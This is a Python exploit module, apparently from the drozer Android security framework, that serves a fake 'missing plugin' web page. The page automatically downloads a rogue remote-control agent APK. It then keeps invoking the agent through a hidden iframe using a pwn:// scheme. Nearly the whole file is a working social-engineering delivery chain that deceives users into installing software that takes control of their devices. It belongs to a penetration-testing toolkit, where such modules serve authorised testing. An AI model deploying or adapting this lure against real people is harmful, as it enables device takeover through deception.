from drozer.modules import Module, common
from WithSecure.common import fs

class UnknownSources(Module, common.Exploit):

    name = "Deliver the Rogue drozer Agent over browser and hold thumbs the user will install it"
    description = """
    Displays a 'missing plugin' page that automatically downloads the Rogue drozer Agent APK. This will rely on the user having the "Unknown Sources" option enabled and ofcourse being gullible enough to install this 'needed plugin'. The delivery web page automatically attempts to invoke the newly installed agent by making use of the pwn:// scheme intent filter.

    Vulnerable:
      * Android - all versions
        
    """
    examples = ""
    author = "Tyrone (@mwrlabs)"
    date = "2013-11-08"
    license = "BSD (3 clause)"
    module_type = "exploit"
    path = ["exploit", "remote", "socialengineering"]
    
    payloads = []
    
    __template = """
<html>
    <head>
        <script>
            function downloadPlugin()
            {
                window.location = "plugin.apk";
            }

            function tryPwn()
            {
                var ifrm = document.createElement("IFRAME");
                ifrm.setAttribute("src", "pwn://lol");
                ifrm.style.visibility = "hidden";
                ifrm.style.display = "none";
                ifrm.style.width = 1+"px"; 
                ifrm.style.height = 1+"px"; 
                document.body.appendChild(ifrm);
            }
        </script>
    </head>
    <body onload="setTimeout('downloadPlugin()', 1500);setInterval('tryPwn()', 1000);">
        <center>
            <img src="" onclick='tryPwn()' />
            <br /><a href="pwn://lol">Reload</a>
        </center>
    </body>
</html>
    """
    
    def __init__(self, session, loader):
        Module.__init__(self, session)
        common.Exploit.__init__(self, loader)
        
        self.payload_format = "N"
        
    def add_arguments(self, parser):
        parser.add_argument("--resource", default=None, help="specify the path component of the resultant exploit URI")
    
    def generate(self, arguments):
        path = self.generate_or_default_path(arguments.resource)
        
        print("Uploading blank page to /...")
        if not self.upload(arguments, "/", " "):
            return

        print("Uploading agent to /plugin.apk...")
        if not self.upload(arguments, "/plugin.apk", self.build_agent(arguments), mimetype="application/vnd.android.package-archive"):
            return
        
        print("Uploading web delivery page to %s..." % path)
        if not self.upload(arguments, path, self.__template, mimetype="text/html"):
            return
        
        if hasattr(arguments, 'push_server') and arguments.push_server != None:
            print("Done. Exploit delivery page is available on: http://%s:%d%s" % (arguments.push_server[0], arguments.push_server[1], path.replace("\\","")))
        else:
            print("Done. Exploit delivery page is available on: http://%s:%d%s" % (arguments.server[0], arguments.server[1], path.replace("\\","")))
        
